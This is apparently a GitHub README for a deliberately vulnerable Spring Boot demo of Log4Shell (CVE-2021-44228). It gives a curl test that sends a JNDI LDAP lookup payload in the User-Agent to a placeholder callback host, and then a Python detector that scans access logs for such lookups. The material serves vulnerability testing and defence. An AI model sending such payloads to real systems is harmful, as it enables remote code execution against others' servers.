korteke / log4shell-demo

Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)


Simple Spring Boot application which is vulnerable to Log4Shell (CVE-2021-44228)

  • Changed default logging framework from logback to log4j2

The application logs the 'User-Agent' header, so the vulnerability can be tested with curl and e.g. an interactsh service:

curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/

A DNS interaction should then appear at app.interactsh.com.
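
For the defender's side of the same test, the following added example (not part of this repository) scans access-log lines for Log4j lookup syntax in the User-Agent field and extracts the callback host from a JNDI lookup. It assumes a front-end proxy or servlet container writing combined-format access logs; the sample lines, IP addresses, and the `scan`/`classify` names are constructed for illustration.

```python
import re

# Constructed sample lines in combined log format (assumption: not output of this app).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '203.0.113.9 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://interactsh-url/a}"',
    '198.51.100.4 - - [12/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${date:yyyy-MM-dd}"',
]

# ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$'
)
# Direct JNDI lookup as used in the curl test above: capture scheme and host.
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)', re.IGNORECASE)
# Any lookup opener at all: a browser or client has no reason to send "${".
LOOKUP_RE = re.compile(r'\$\{')


def classify(user_agent):
    """Return (kind, scheme, host) for a suspicious User-Agent, else None."""
    m = JNDI_RE.search(user_agent)
    if m:
        return ("jndi-lookup", m.group("scheme").lower(), m.group("host"))
    if LOOKUP_RE.search(user_agent):
        return ("lookup-syntax", None, None)
    return None


def scan(lines):
    """Return one finding per log line whose User-Agent carries lookup syntax."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at fields
        verdict = classify(m.group("ua"))
        if verdict:
            kind, scheme, host = verdict
            findings.append({"line": number, "ip": m.group("ip"),
                             "kind": kind, "scheme": scheme, "host": host})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The extracted host can be matched against DNS resolver logs to confirm whether the application actually performed the lookup.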

Docker hub

Link to Docker hub
